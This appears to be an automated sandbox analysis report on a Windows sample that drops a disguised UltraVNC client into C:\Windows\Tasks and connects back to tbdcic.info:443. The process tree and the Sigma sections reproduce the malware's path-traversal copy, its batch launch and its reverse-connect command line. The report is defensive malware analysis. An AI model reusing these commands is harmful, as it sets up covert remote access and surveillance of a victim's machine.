Edit tour

Windows Analysis Report
mSRW5AfJpC.exe

Overview

General Information

Sample name:	mSRW5AfJpC.exe renamed because original name is a hash value
Original sample name:	41a6e70e243bcded4033dc8050773fd3bd8870da995c4df2cba861bd2492e88c.exe
Analysis ID:	1579875
MD5:	95bb89ebdcec89e123e5647555d63aed
SHA1:	e7aa5b272cb301dfda33956a37aa9506d176e6ce
SHA256:	41a6e70e243bcded4033dc8050773fd3bd8870da995c4df2cba861bd2492e88c
Tags:	exetbdcic-infouser-JAMESWT_MHT
Infos:

Detection

UltraVNC

Score:	84
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Icon mismatch, binary includes an icon from a different legit application in order to fool users

Yara detected UltraVNC Hacktool

AI detected suspicious sample

Contains VNC / remote desktop functionality (version string found)

Contains functionality to register a low level keyboard hook

Drops executables to the windows directory (C:\Windows) and starts them

Sigma detected: Execution from Suspicious Folder

Sigma detected: Files With System Process Name In Unsuspected Locations

Sigma detected: Suspicious UltraVNC Execution

Binary contains a suspicious time stamp

Contains functionality for read data from the clipboard

Contains functionality to check if a debugger is running (IsDebuggerPresent)

Contains functionality to check if a debugger is running (OutputDebugString,GetLastError)

Contains functionality to check if a window is minimized (may be used to check if an application is visible)

Contains functionality to check the parent process ID (often done to detect debuggers and analysis systems)

Contains functionality to delete services

Contains functionality to dynamically determine API calls

Contains functionality to enumerate process and check for explorer.exe or svchost.exe (often used for thread injection)

Contains functionality to enumerate running services

Contains functionality to launch a process as a different user

Contains functionality to launch a program with higher privileges

Contains functionality to modify clipboard data

Contains functionality to query locales information (e.g. system language)

Contains functionality to read the clipboard data

Contains functionality to record screenshots

Contains functionality to retrieve information about pressed keystrokes

Contains functionality to shutdown / reboot the system

Contains functionality to simulate keystroke presses

Contains functionality to simulate mouse events

Creates a process in suspended mode (likely to inject code)

Creates files inside the system directory

Creates job files (autostart)

Detected potential crypto function

Dropped file seen in connection with other malware

Drops PE files

Drops PE files to the windows directory (C:\Windows)

Drops files with a non-matching file extension (content does not match file extension)

Enables debug privileges

Extensive use of GetProcAddress (often used to hide API calls)

Found a high number of Window / User specific system calls (may be a loop to detect user behavior)

Found decision node followed by non-executed suspicious APIs

Found dropped PE file which has not been started or loaded

Found evasive API chain checking for process token information

Found large amount of non-executed APIs

Found potential string decryption / allocating functions

May sleep (evasive loops) to hinder dynamic analysis

May use bcdedit to modify the Windows boot settings

PE file contains an invalid checksum

PE file contains executable resources (Code or Archives)

PE file contains sections with non-standard names

Potential key logger detected (key state polling based)

Queries the volume information (name, serial number etc) of a device

Sample execution stops while process was sleeping (likely an evasion)

Sample file is different than original file name gathered from version info

Sigma detected: Potential Command Line Path Traversal Evasion Attempt

Sigma detected: Suspicious Copy From or To System Directory

Sigma detected: Suspicious Process Start Locations

Uses 32bit PE files

Uses code obfuscation techniques (call, push, ret)

Uses taskkill to terminate processes

Classification

Process Tree

System is w10x64

mSRW5AfJpC.exe (PID: 1516 cmdline: "C:\Users\user\Desktop\mSRW5AfJpC.exe" MD5: 95BB89EBDCEC89E123E5647555D63AED)

cmd.exe (PID: 1784 cmdline: "C:\Windows\System32\cmd.exe" /c copy /y "%CD%\*.*" "%CD%\..\..\..\..\..\..\Windows\Tasks\" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)

conhost.exe (PID: 3168 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

cmd.exe (PID: 5968 cmdline: "C:\Windows\System32\cmd.exe" /c cd C:\Windows\Tasks\ & copy 4735396734841324 4735396734841324.cmd MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)

conhost.exe (PID: 1472 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

cmd.exe (PID: 6572 cmdline: "C:\Windows\System32\cmd.exe" /c cd C:\Windows\Tasks\ & 4735396734841324.cmd MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)

conhost.exe (PID: 3504 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

timeout.exe (PID: 5600 cmdline: timeout /t 1 MD5: 976566BEEFCCA4A159ECBDB2D4B1A3E3)

Acrobat.exe (PID: 3620 cmdline: "C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe" "C:\Users\user\Downloads\Lom.pdf" MD5: 24EAD1C46A47022347DC0F05F6EFBB8C)

AcroCEF.exe (PID: 6084 cmdline: "C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe" --backgroundcolor=16777215 MD5: 9B38E8E8B6DD9622D24B53E095C5D9BE)

AcroCEF.exe (PID: 3180 cmdline: "C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --log-severity=disable --user-agent-product="ReaderServices/23.6.20320 Chrome/105.0.0.0" --lang=en-US --user-data-dir="C:\Users\user\AppData\Local\CEF\User Data" --log-file="C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\debug.log" --mojo-platform-channel-handle=2100 --field-trial-handle=1752,i,17186980694062401474,5929717192607302477,131072 --disable-features=BackForwardCache,CalculateNativeWinOcclusion,WinUseBrowserSpellChecker /prefetch:8 MD5: 9B38E8E8B6DD9622D24B53E095C5D9BE)

timeout.exe (PID: 5948 cmdline: timeout /t 1 MD5: 976566BEEFCCA4A159ECBDB2D4B1A3E3)

taskkill.exe (PID: 412 cmdline: taskkill /f /im sync_browser.exe MD5: CA313FD7E6C2A778FFD21CFB5C1C56CD)

timeout.exe (PID: 1900 cmdline: timeout /t 2 MD5: 976566BEEFCCA4A159ECBDB2D4B1A3E3)

timeout.exe (PID: 7596 cmdline: timeout /t 1 MD5: 976566BEEFCCA4A159ECBDB2D4B1A3E3)

timeout.exe (PID: 7864 cmdline: timeout /t 2 MD5: 976566BEEFCCA4A159ECBDB2D4B1A3E3)

sync_browser.exe (PID: 7968 cmdline: C:\Windows\Tasks\sync_browser.exe MD5: 749B3A68B9C5325D592822EE7C2C17EC)

timeout.exe (PID: 7976 cmdline: timeout /t 8 MD5: 976566BEEFCCA4A159ECBDB2D4B1A3E3)

sync_browser.exe (PID: 8104 cmdline: C:\Windows\Tasks\sync_browser.exe -autoreconnect -id:user-PC_TtF9ns -connect tbdcic.info:443 MD5: 749B3A68B9C5325D592822EE7C2C17EC)

timeout.exe (PID: 8112 cmdline: timeout /t 2 MD5: 976566BEEFCCA4A159ECBDB2D4B1A3E3)

timeout.exe (PID: 8172 cmdline: timeout /t 4 MD5: 976566BEEFCCA4A159ECBDB2D4B1A3E3)

timeout.exe (PID: 7960 cmdline: timeout /t 42 MD5: 976566BEEFCCA4A159ECBDB2D4B1A3E3)

timeout.exe (PID: 7996 cmdline: timeout /t 42 MD5: 976566BEEFCCA4A159ECBDB2D4B1A3E3)

timeout.exe (PID: 6408 cmdline: timeout /t 42 MD5: 976566BEEFCCA4A159ECBDB2D4B1A3E3)

timeout.exe (PID: 7588 cmdline: timeout /t 42 MD5: 976566BEEFCCA4A159ECBDB2D4B1A3E3)

cleanup

Yara Signatures

Dropped Files

Source	Rule	Description	Author
C:\Windows\Tasks\Fgyxfc.Qnwi4I	JoeSecurity_UltraVNC	Yara detected UltraVNC Hacktool	Joe Security
C:\Windows\Tasks\sync_browser.exe	JoeSecurity_UltraVNC	Yara detected UltraVNC Hacktool	Joe Security
C:\Users\user\AppData\Local\Temp\7ZipSfx.000\Fgyxfc.Qnwi4I	JoeSecurity_UltraVNC	Yara detected UltraVNC Hacktool	Joe Security

Memory Dumps

Source	Rule	Description	Author
00000013.00000000.2215667944.00007FF74027C000.00000002.00000001.01000000.00000007.sdmp	JoeSecurity_UltraVNC	Yara detected UltraVNC Hacktool	Joe Security
00000017.00000000.2295744308.00007FF74027C000.00000002.00000001.01000000.00000007.sdmp	JoeSecurity_UltraVNC	Yara detected UltraVNC Hacktool	Joe Security
00000000.00000003.2115814027.000000000246B000.00000004.00001000.00020000.00000000.sdmp	JoeSecurity_UltraVNC	Yara detected UltraVNC Hacktool	Joe Security
00000013.00000002.3977563809.00007FF7400D9000.00000002.00000001.01000000.00000007.sdmp	JoeSecurity_UltraVNC	Yara detected UltraVNC Hacktool	Joe Security
00000017.00000002.2298716392.00007FF7400D9000.00000002.00000001.01000000.00000007.sdmp	JoeSecurity_UltraVNC	Yara detected UltraVNC Hacktool	Joe Security
00000017.00000002.2298861822.00007FF74027C000.00000002.00000001.01000000.00000007.sdmp	JoeSecurity_UltraVNC	Yara detected UltraVNC Hacktool	Joe Security
00000000.00000003.2115476350.0000000002930000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_UltraVNC	Yara detected UltraVNC Hacktool	Joe Security
00000013.00000000.2215399412.00007FF7400D9000.00000002.00000001.01000000.00000007.sdmp	JoeSecurity_UltraVNC	Yara detected UltraVNC Hacktool	Joe Security
00000013.00000002.3977776758.00007FF74027C000.00000002.00000001.01000000.00000007.sdmp	JoeSecurity_UltraVNC	Yara detected UltraVNC Hacktool	Joe Security
00000017.00000000.2295669482.00007FF7400D9000.00000002.00000001.01000000.00000007.sdmp	JoeSecurity_UltraVNC	Yara detected UltraVNC Hacktool	Joe Security
00000000.00000003.2115476350.0000000002765000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_UltraVNC	Yara detected UltraVNC Hacktool	Joe Security
Process Memory Space: mSRW5AfJpC.exe PID: 1516	JoeSecurity_UltraVNC	Yara detected UltraVNC Hacktool	Joe Security
Process Memory Space: sync_browser.exe PID: 7968	JoeSecurity_UltraVNC	Yara detected UltraVNC Hacktool	Joe Security
Process Memory Space: sync_browser.exe PID: 8104	JoeSecurity_UltraVNC	Yara detected UltraVNC Hacktool	Joe Security
Click to see the 9 entries

Unpacked PEs

Source	Rule	Description	Author
19.0.sync_browser.exe.7ff740000000.0.unpack	JoeSecurity_UltraVNC	Yara detected UltraVNC Hacktool	Joe Security
19.2.sync_browser.exe.7ff740000000.0.unpack	JoeSecurity_UltraVNC	Yara detected UltraVNC Hacktool	Joe Security
23.0.sync_browser.exe.7ff740000000.0.unpack	JoeSecurity_UltraVNC	Yara detected UltraVNC Hacktool	Joe Security
23.2.sync_browser.exe.7ff740000000.0.unpack	JoeSecurity_UltraVNC	Yara detected UltraVNC Hacktool	Joe Security

Sigma Signatures

System Summary

Sigma detected: Execution from Suspicious Folder

Source: Process started

Author: Florian Roth (Nextron Systems), Tim Shelton: Data: Command: C:\Windows\Tasks\sync_browser.exe, CommandLine: C:\Windows\Tasks\sync_browser.exe, CommandLine|base64offset|contains: , Image: C:\Windows\Tasks\sync_browser.exe, NewProcessName: C:\Windows\Tasks\sync_browser.exe, OriginalFileName: C:\Windows\Tasks\sync_browser.exe, ParentCommandLine: "C:\Windows\System32\cmd.exe" /c cd C:\Windows\Tasks\ & 4735396734841324.cmd, ParentImage: C:\Windows\SysWOW64\cmd.exe, ParentProcessId: 6572, ParentProcessName: cmd.exe, ProcessCommandLine: C:\Windows\Tasks\sync_browser.exe, ProcessId: 7968, ProcessName: sync_browser.exe

Sigma detected: Files With System Process Name In Unsuspected Locations

Source: File created

Author: Sander Wiebing, Tim Shelton, Nasreddine Bencherchali (Nextron Systems): Data: EventID: 11, Image: C:\Windows\SysWOW64\cmd.exe, ProcessId: 6572, TargetFilename: C:\Windows\Tasks\conhost.exe

Sigma detected: Suspicious UltraVNC Execution

Source: Process started

Author: Bhabesh Raj: Data: Command: C:\Windows\Tasks\sync_browser.exe -autoreconnect -id:user-PC_TtF9ns -connect tbdcic.info:443, CommandLine: C:\Windows\Tasks\sync_browser.exe -autoreconnect -id:user-PC_TtF9ns -connect tbdcic.info:443, CommandLine|base64offset|contains: yr, Image: C:\Windows\Tasks\sync_browser.exe, NewProcessName: C:\Windows\Tasks\sync_browser.exe, OriginalFileName: C:\Windows\Tasks\sync_browser.exe, ParentCommandLine: "C:\Windows\System32\cmd.exe" /c cd C:\Windows\Tasks\ & 4735396734841324.cmd, ParentImage: C:\Windows\SysWOW64\cmd.exe, ParentProcessId: 6572, ParentProcessName: cmd.exe, ProcessCommandLine: C:\Windows\Tasks\sync_browser.exe -autoreconnect -id:user-PC_TtF9ns -connect tbdcic.info:443, ProcessId: 8104, ProcessName: sync_browser.exe

Sigma detected: Potential Command Line Path Traversal Evasion Attempt

Source: Process started

Author: Christian Burkard (Nextron Systems): Data: Command: "C:\Windows\System32\cmd.exe" /c copy /y "%CD%\*.*" "%CD%\..\..\..\..\..\..\Windows\Tasks\", CommandLine: "C:\Windows\System32\cmd.exe" /c copy /y "%CD%\*.*" "%CD%\..\..\..\..\..\..\Windows\Tasks\", CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\cmd.exe, NewProcessName: C:\Windows\SysWOW64\cmd.exe, OriginalFileName: C:\Windows\SysWOW64\cmd.exe, ParentCommandLine: "C:\Users\user\Desktop\mSRW5AfJpC.exe", ParentImage: C:\Users\user\Desktop\mSRW5AfJpC.exe, ParentProcessId: 1516, ParentProcessName: mSRW5AfJpC.exe, ProcessCommandLine: "C:\Windows\System32\cmd.exe" /c copy /y "%CD%\*.*" "%CD%\..\..\..\..\..\..\Windows\Tasks\", ProcessId: 1784, ProcessName: cmd.exe

Sigma detected: Suspicious Copy From or To System Directory

Source: Process started

Author: Florian Roth (Nextron Systems), Markus Neis, Tim Shelton (HAWK.IO), Nasreddine Bencherchali (Nextron Systems): Data: Command: "C:\Windows\System32\cmd.exe" /c copy /y "%CD%\*.*" "%CD%\..\..\..\..\..\..\Windows\Tasks\", CommandLine: "C:\Windows\System32\cmd.exe" /c copy /y "%CD%\*.*" "%CD%\..\..\..\..\..\..\Windows\Tasks\", CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\cmd.exe, NewProcessName: C:\Windows\SysWOW64\cmd.exe, OriginalFileName: C:\Windows\SysWOW64\cmd.exe, ParentCommandLine: "C:\Users\user\Desktop\mSRW5AfJpC.exe", ParentImage: C:\Users\user\Desktop\mSRW5AfJpC.exe, ParentProcessId: 1516, ParentProcessName: mSRW5AfJpC.exe, ProcessCommandLine: "C:\Windows\System32\cmd.exe" /c copy /y "%CD%\*.*" "%CD%\..\..\..\..\..\..\Windows\Tasks\", ProcessId: 1784, ProcessName: cmd.exe

Sigma detected: Suspicious Process Start Locations

Source: Process started

Author: juju4, Jonhnathan Ribeiro, oscd.community: Data: Command: C:\Windows\Tasks\sync_browser.exe, CommandLine: C:\Windows\Tasks\sync_browser.exe, CommandLine|base64offset|contains: , Image: C:\Windows\Tasks\sync_browser.exe, NewProcessName: C:\Windows\Tasks\sync_browser.exe, OriginalFileName: C:\Windows\Tasks\sync_browser.exe, ParentCommandLine: "C:\Windows\System32\cmd.exe" /c cd C:\Windows\Tasks\ & 4735396734841324.cmd, ParentImage: C:\Windows\SysWOW64\cmd.exe, ParentProcessId: 6572, ParentProcessName: cmd.exe, ProcessCommandLine: C:\Windows\Tasks\sync_browser.exe, ProcessId: 7968, ProcessName: sync_browser.exe

Suricata Signatures

⊘No Suricata rule has matched

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

AV Detection

AI detected suspicious sample

Source: Submited Sample

Integrated Neural Analysis Model: Matched 98.4% probability

Source: mSRW5AfJpC.exe

Static PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, 32BIT_MACHINE

Source:	Binary string: conhost.pdbUGP source: mSRW5AfJpC.exe, 00000000.00000003.2113874779.0000000002765000.00000004.00000020.00020000.00000000.sdmp, Ivn55G.PqhJnU.2.dr, conhost.exe.6.dr, Ivn55G.PqhJnU.0.dr
Source:	Binary string: conhost.pdb source: mSRW5AfJpC.exe, 00000000.00000003.2113874779.0000000002765000.00000004.00000020.00020000.00000000.sdmp, Ivn55G.PqhJnU.2.dr, conhost.exe.6.dr, Ivn55G.PqhJnU.0.dr

Source: C:\Users\user\Desktop\mSRW5AfJpC.exe	Code function: 0_2_00403387 GetFileAttributesW,SetLastError,FindFirstFileW,FindClose,CompareFileTime,	0_2_00403387
Source: C:\Users\user\Desktop\mSRW5AfJpC.exe	Code function: 0_2_00402EE6 FindFirstFileW,SetFileAttributesW,lstrcmpW,lstrcmpW,SetFileAttributesW,DeleteFileW,FindNextFileW,FindClose,SetFileAttributesW,RemoveDirectoryW,??3@YAXPAX@Z,??3@YAXPAX@Z,	0_2_00402EE6
Source: C:\Windows\Tasks\sync_browser.exe	Code function: 19_2_00007FF74002C210 SetErrorMode,FindFirstFileA,SetErrorMode,FindClose,	19_2_00007FF74002C210
Source: C:\Windows\Tasks\sync_browser.exe	Code function: 19_2_00007FF7400BA228 __doserrno,_errno,_invalid_parameter_noinfo,_errno,__doserrno,_getdrive,FindFirstFileExA,_errno,_errno,_errno,_errno,_errno,GetDriveTypeA,free,free,_errno,__doserrno,_wsopen_s,FileTimeToLocalFileTime,FileTimeToSystemTime,FileTimeToLocalFileTime,FileTimeToSystemTime,FileTimeToLocalFileTime,FileTimeToSystemTime,FindClose,GetLastError,FindClose,	19_2_00007FF7400BA228
Source: C:\Windows\Tasks\sync_browser.exe	Code function: 19_2_00007FF740026DD1 OpenInputDesktop,CloseDesktop,GetTickCount,GetLogicalDriveStringsA,GetDriveTypeA,SHGetMalloc,SHGetSpecialFolderLocation,SHGetPathFromIDListA,SetErrorMode,FindFirstFileA,SetErrorMode,lstrlenA,FindNextFileA,FindClose,LeaveCriticalSection,	19_2_00007FF740026DD1
Source: C:\Windows\Tasks\sync_browser.exe	Code function: 19_2_00007FF740005910 GetModuleFileNameA,FindFirstFileA,SendMessageA,FindNextFileA,FindClose,	19_2_00007FF740005910
Source: C:\Windows\Tasks\sync_browser.exe	Code function: 23_2_00007FF74002C210 SetErrorMode,FindFirstFileA,SetErrorMode,FindClose,	23_2_00007FF74002C210
Source: C:\Windows\Tasks\sync_browser.exe	Code function: 23_2_00007FF7400BA228 __doserrno,_errno,_invalid_parameter_noinfo,_errno,__doserrno,_getdrive,FindFirstFileExA,_errno,_errno,_errno,_errno,_errno,GetDriveTypeA,free,free,_errno,__doserrno,_wsopen_s,FileTimeToLocalFileTime,FileTimeToSystemTime,FileTimeToLocalFileTime,FileTimeToSystemTime,FileTimeToLocalFileTime,FileTimeToSystemTime,FindClose,GetLastError,FindClose,	23_2_00007FF7400BA228
Source: C:\Windows\Tasks\sync_browser.exe	Code function: 23_2_00007FF740026DD1 OpenInputDesktop,CloseDesktop,GetTickCount,GetLogicalDriveStringsA,GetDriveTypeA,SHGetMalloc,SHGetSpecialFolderLocation,SHGetPathFromIDListA,SetErrorMode,FindFirstFileA,SetErrorMode,lstrlenA,FindNextFileA,FindClose,LeaveCriticalSection,	23_2_00007FF740026DD1
Source: C:\Windows\Tasks\sync_browser.exe	Code function: 23_2_00007FF740005910 GetModuleFileNameA,FindFirstFileA,SendMessageA,FindNextFileA,FindClose,	23_2_00007FF740005910

Source: C:\Windows\Tasks\sync_browser.exe

Code function: 19_2_00007FF740026DD1 OpenInputDesktop,CloseDesktop,GetTickCount,GetLogicalDriveStringsA,GetDriveTypeA,SHGetMalloc,SHGetSpecialFolderLocation,SHGetPathFromIDListA,SetErrorMode,FindFirstFileA,SetErrorMode,lstrlenA,FindNextFileA,FindClose,LeaveCriticalSection,

19_2_00007FF740026DD1

Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1

Source: C:\Windows\Tasks\sync_browser.exe

Code function: 19_2_00007FF74000BB70 recv,

19_2_00007FF74000BB70

Source: global traffic	DNS traffic detected: DNS query: x1.i.lencr.org
Source: global traffic	DNS traffic detected: DNS query: tbdcic.info

Source: mSRW5AfJpC.exe, 00000000.00000003.2115814027.0000000002479000.00000004.00001000.00020000.00000000.sdmp, mSRW5AfJpC.exe, 00000000.00000003.2115476350.000000000293E000.00000004.00000020.00020000.00000000.sdmp, Fgyxfc.Qnwi4I.0.dr, Fgyxfc.Qnwi4I.2.dr, sync_browser.exe.6.dr	String found in binary or memory: http://crl.thawte.com/ThawteTimestampingCA.crl0
Source: 77EC63BDA74BD0D0E0426DC8F80085060.12.dr	String found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en/authrootstl.cab
Source: mSRW5AfJpC.exe, 00000000.00000003.2115476350.0000000002765000.00000004.00000020.00020000.00000000.sdmp, sync_browser.exe, 00000013.00000002.3977563809.00007FF7400D9000.00000002.00000001.01000000.00000007.sdmp, sync_browser.exe, 00000013.00000000.2215399412.00007FF7400D9000.00000002.00000001.01000000.00000007.sdmp, sync_browser.exe, 00000017.00000002.2298716392.00007FF7400D9000.00000002.00000001.01000000.00000007.sdmp, sync_browser.exe, 00000017.00000000.2295669482.00007FF7400D9000.00000002.00000001.01000000.00000007.sdmp, Fgyxfc.Qnwi4I.0.dr, Fgyxfc.Qnwi4I.2.dr, sync_browser.exe.6.dr	String found in binary or memory: http://forum.uvnc.com
Source: mSRW5AfJpC.exe, 00000000.00000003.2115476350.0000000002765000.00000004.00000020.00020000.00000000.sdmp, sync_browser.exe, 00000013.00000002.3977563809.00007FF7400D9000.00000002.00000001.01000000.00000007.sdmp, sync_browser.exe, 00000013.00000000.2215399412.00007FF7400D9000.00000002.00000001.01000000.00000007.sdmp, sync_browser.exe, 00000017.00000002.2298716392.00007FF7400D9000.00000002.00000001.01000000.00000007.sdmp, sync_browser.exe, 00000017.00000000.2295669482.00007FF7400D9000.00000002.00000001.01000000.00000007.sdmp, Fgyxfc.Qnwi4I.0.dr, Fgyxfc.Qnwi4I.2.dr, sync_browser.exe.6.dr	String found in binary or memory: http://java.sun.com/products/plugin/index.html#download
Source: mSRW5AfJpC.exe, 00000000.00000003.2115476350.0000000002765000.00000004.00000020.00020000.00000000.sdmp, sync_browser.exe, 00000013.00000002.3977563809.00007FF7400D9000.00000002.00000001.01000000.00000007.sdmp, sync_browser.exe, 00000013.00000000.2215399412.00007FF7400D9000.00000002.00000001.01000000.00000007.sdmp, sync_browser.exe, 00000017.00000002.2298716392.00007FF7400D9000.00000002.00000001.01000000.00000007.sdmp, sync_browser.exe, 00000017.00000000.2295669482.00007FF7400D9000.00000002.00000001.01000000.00000007.sdmp, Fgyxfc.Qnwi4I.0.dr, Fgyxfc.Qnwi4I.2.dr, sync_browser.exe.6.dr	String found in binary or memory: http://java.sun.com/update/1.4.2/jinstall-1_4-windows-i586.cab#Version=1
Source: mSRW5AfJpC.exe, 00000000.00000003.2115814027.0000000002479000.00000004.00001000.00020000.00000000.sdmp, mSRW5AfJpC.exe, 00000000.00000003.2115476350.000000000293E000.00000004.00000020.00020000.00000000.sdmp, Fgyxfc.Qnwi4I.0.dr, Fgyxfc.Qnwi4I.2.dr, sync_browser.exe.6.dr	String found in binary or memory: http://ocsp.thawte.com0
Source: mSRW5AfJpC.exe, 00000000.00000003.2115814027.0000000002479000.00000004.00001000.00020000.00000000.sdmp, mSRW5AfJpC.exe, 00000000.00000003.2115476350.000000000293E000.00000004.00000020.00020000.00000000.sdmp, Fgyxfc.Qnwi4I.0.dr, Fgyxfc.Qnwi4I.2.dr, sync_browser.exe.6.dr	String found in binary or memory: http://ts-aia.ws.symantec.com/tss-ca-g2.cer0
Source: mSRW5AfJpC.exe, 00000000.00000003.2115814027.0000000002479000.00000004.00001000.00020000.00000000.sdmp, mSRW5AfJpC.exe, 00000000.00000003.2115476350.000000000293E000.00000004.00000020.00020000.00000000.sdmp, Fgyxfc.Qnwi4I.0.dr, Fgyxfc.Qnwi4I.2.dr, sync_browser.exe.6.dr	String found in binary or memory: http://ts-crl.ws.symantec.com/tss-ca-g2.crl0(
Source: mSRW5AfJpC.exe, 00000000.00000003.2115814027.0000000002479000.00000004.00001000.00020000.00000000.sdmp, mSRW5AfJpC.exe, 00000000.00000003.2115476350.000000000293E000.00000004.00000020.00020000.00000000.sdmp, Fgyxfc.Qnwi4I.0.dr, Fgyxfc.Qnwi4I.2.dr, sync_browser.exe.6.dr	String found in binary or memory: http://ts-ocsp.ws.symantec.com07
Source: mSRW5AfJpC.exe, 00000000.00000003.2115814027.000000000246B000.00000004.00001000.00020000.00000000.sdmp, mSRW5AfJpC.exe, 00000000.00000003.2115476350.0000000002930000.00000004.00000020.00020000.00000000.sdmp, mSRW5AfJpC.exe, 00000000.00000003.2115476350.0000000002765000.00000004.00000020.00020000.00000000.sdmp, sync_browser.exe, 00000013.00000000.2215667944.00007FF74027C000.00000002.00000001.01000000.00000007.sdmp, sync_browser.exe, 00000013.00000002.3977563809.00007FF7400D9000.00000002.00000001.01000000.00000007.sdmp, sync_browser.exe, 00000013.00000000.2215399412.00007FF7400D9000.00000002.00000001.01000000.00000007.sdmp, sync_browser.exe, 00000017.00000000.2295744308.00007FF74027C000.00000002.00000001.01000000.00000007.sdmp, sync_browser.exe, 00000017.00000002.2298716392.00007FF7400D9000.00000002.00000001.01000000.00000007.sdmp, sync_browser.exe, 00000017.00000000.2295669482.00007FF7400D9000.00000002.00000001.01000000.00000007.sdmp, Fgyxfc.Qnwi4I.0.dr, Fgyxfc.Qnwi4I.2.dr, sync_browser.exe.6.dr	String found in binary or memory: http://www.uvnc.com
Source: mSRW5AfJpC.exe, 00000000.00000003.2115476350.0000000002765000.00000004.00000020.00020000.00000000.sdmp, sync_browser.exe, 00000013.00000002.3977563809.00007FF7400D9000.00000002.00000001.01000000.00000007.sdmp, sync_browser.exe, 00000013.00000000.2215399412.00007FF7400D9000.00000002.00000001.01000000.00000007.sdmp, sync_browser.exe, 00000017.00000002.2298716392.00007FF7400D9000.00000002.00000001.01000000.00000007.sdmp, sync_browser.exe, 00000017.00000000.2295669482.00007FF7400D9000.00000002.00000001.01000000.00000007.sdmp, Fgyxfc.Qnwi4I.0.dr, Fgyxfc.Qnwi4I.2.dr, sync_browser.exe.6.dr	String found in binary or memory: http://www.uvnc.comopenhttp://forum.uvnc.comnet
Source: 2D85F72862B55C4EADD9E66E06947F3D0.12.dr	String found in binary or memory: http://x1.i.lencr.org/

Source: unknown	Network traffic detected: HTTP traffic on port 49997 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49997
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49994
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49894
Source: unknown	Network traffic detected: HTTP traffic on port 49994 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49815 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49767 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49894 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49739
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49738
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49815
Source: unknown	Network traffic detected: HTTP traffic on port 49738 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49739 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49767

Key, Mouse, Clipboard, Microphone and Screen Capturing

Contains functionality to register a low level keyboard hook

Source: C:\Users\user\Desktop\mSRW5AfJpC.exe

Code function: 0_2_00408630 SetWindowsHookExW 00000002,Function_00008602,00000000,00000000

0_2_00408630

Source: C:\Windows\Tasks\sync_browser.exe

Code function: 19_2_00007FF740001AE0 OpenClipboard,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,GlobalSize,WideCharToMultiByte,WideCharToMultiByte,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,GlobalSize,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,GlobalSize,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,GlobalSize,GlobalUnlock,CloseClipboard,

19_2_00007FF740001AE0

Source: C:\Windows\Tasks\sync_browser.exe	Code function: 19_2_00007FF7400313A0 OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,GlobalUnlock,SetClipboardData,CloseClipboard,	19_2_00007FF7400313A0
Source: C:\Windows\Tasks\sync_browser.exe	Code function: 19_2_00007FF740001DD0 OpenClipboard,EmptyClipboard,CloseClipboard,MultiByteToWideChar,GlobalAlloc,GlobalLock,MultiByteToWideChar,GlobalUnlock,SetClipboardData,GlobalFree,CloseClipboard,GlobalAlloc,CloseClipboard,GlobalLock,GlobalUnlock,SetClipboardData,GlobalFree,GlobalAlloc,CloseClipboard,GlobalLock,GlobalUnlock,SetClipboardData,GlobalFree,GlobalAlloc,CloseClipboard,GlobalLock,GlobalUnlock,SetClipboardData,GlobalFree,CloseClipboard,	19_2_00007FF740001DD0
Source: C:\Windows\Tasks\sync_browser.exe	Code function: 23_2_00007FF7400313A0 OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,GlobalUnlock,SetClipboardData,CloseClipboard,	23_2_00007FF7400313A0
Source: C:\Windows\Tasks\sync_browser.exe	Code function: 23_2_00007FF740001DD0 OpenClipboard,EmptyClipboard,CloseClipboard,MultiByteToWideChar,GlobalAlloc,GlobalLock,MultiByteToWideChar,GlobalUnlock,SetClipboardData,GlobalFree,CloseClipboard,GlobalAlloc,CloseClipboard,GlobalLock,GlobalUnlock,SetClipboardData,GlobalFree,GlobalAlloc,CloseClipboard,GlobalLock,GlobalUnlock,SetClipboardData,GlobalFree,GlobalAlloc,CloseClipboard,GlobalLock,GlobalUnlock,SetClipboardData,GlobalFree,CloseClipboard,	23_2_00007FF740001DD0

Source: C:\Windows\Tasks\sync_browser.exe

19_2_00007FF740001AE0

Source: C:\Windows\Tasks\sync_browser.exe

